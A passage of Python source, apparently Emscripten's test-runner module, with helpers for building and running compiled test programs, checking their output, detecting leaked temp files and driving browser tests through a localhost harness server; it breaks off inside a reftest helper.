self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super().setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super().setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.node_args = [
# Increate stack trace limit to maximise usefulness of test failure reports
'--stack-trace-limit=50',
# Opt in to node v15 default behaviour:
# https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode
'--unhandled-rejections=throw',
# Include backtrace for all uncuaght exceptions (not just Error).
'--trace-uncaught',
]
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = config.JS_ENGINES.copy()
self.wasm_engines = config.WASM_ENGINES.copy()
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR we still try to start with an empty directoy as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret.append(f'-s{key}')
elif type(value) == list:
ret.append(f'-s{key}={",".join(value)}')
else:
ret.append(f'-s{key}={value}')
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once its available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
try:
# Comment out --quiet if more detailed error logging is needed
shared.run_process(es_check + ['es5', os.path.abspath(filename), '--quiet'], stderr=PIPE, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stderr)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False, js_outfile=True, emcc_args=[], output_basename=None):
suffix = '.js' if js_outfile else '.wasm'
compiler = [compiler_for(filename, force_c)]
if compiler[0] == EMCC:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# We link with C++ stdlibs, even when linking with emcc for historical reasons. We can remove
# this if this issues is fixed.
compiler.append('-nostdlib++')
if force_c:
compiler.append('-xc')
if output_basename:
output = output_basename + suffix
else:
basename = os.path.basename(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + emcc_args + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + str(include) for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and not self.uses_es6:
self.verify_es5(output)
if js_outfile and self.uses_memory_init_file():
src = read_file(output)
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
js = read_file(javascript_file)
blob = "".join(js.splitlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[],
output_nicerizer=None,
assert_returncode=0,
interleaved_output=True):
# use files, as PIPE can get too full and hang us
stdout_file = self.in_dir('stdout')
stderr_file = None
if interleaved_output:
stderr = STDOUT
else:
stderr_file = self.in_dir('stderr')
stderr = open(stderr_file, 'w')
error = None
if not engine:
engine = self.js_engines[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout_file, 'w'),
stderr=stderr,
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
ret = read_file(stdout_file)
if not interleaved_output:
ret += read_file(stderr_file)
if output_nicerizer:
ret = output_nicerizer(ret)
if error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(read_file(stdout_file), end='')
print('-- end program output --')
if not interleaved_output:
print('-- begin program stderr --')
print(read_file(stderr_file), end='')
print('-- end program stderr --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(read_binary(file1),
read_binary(file2))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init=None, cache_name_extra='', native=False):
if env_init is None:
env_init = {}
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
write_binary(bc_file, contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
cflags = ' '.join(self.get_emcc_args())
env_init.setdefault('CFLAGS', cflags)
env_init.setdefault('CXXFLAGS', cflags)
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native)
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
print(e.stdout)
print(e.stderr)
self.fail(f'subprocess exited with non-zero return code({e.returncode}): `{shared.shlex_join(cmd)}`')
def emcc(self, filename, args=[], output_filename=None, **kwargs):
if output_filename is None:
output_filename = filename + '.o'
try_delete(output_filename)
self.run_process([compiler_for(filename), filename] + args + ['-o', output_filename], **kwargs)
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc() {
afunc("b");
}
''')
create_file('libc.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-s', 'SIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.c', ['liba' + so])
ccshared('libc.c', ['liba' + so])
self.set_setting('MAIN_MODULE')
extra_args = ['-L.', 'libb' + so, 'libc' + so]
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n', emcc_args=extra_args)
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc_ptr)(), (*cfunc_ptr)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc_ptr = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc_ptr != NULL);
cfunc_ptr = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc_ptr != NULL);
bfunc_ptr();
cfunc_ptr();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = self.js_engines
for engine in js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
write_file(filename, src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, read_file(expected_output_filename), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
out_suffix = kwargs.pop('out_suffix', '')
outfile = shared.unsuffixed(srcfile) + out_suffix + '.out'
expected = read_file(outfile)
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False, emcc_args=[],
interleaved_output=True,
output_basename=None):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
js_file = self.build(filename, libraries=libraries, includes=includes,
force_c=force_c, emcc_args=emcc_args,
output_basename=output_basename)
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.replace_suffix(js_file, '.wasm.c')
executable = shared.replace_suffix(js_file, '.exe')
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode,
interleaved_output=interleaved_output)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party/freetype/include'),
'-I' + test_file('third_party/poppler/include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(read_binary(test_file('browser_harness.html')))
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT mactros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
reporting = read_file(test_file('browser_reporting.js'))
write_file('reftest.js', '''
function doReftest() {
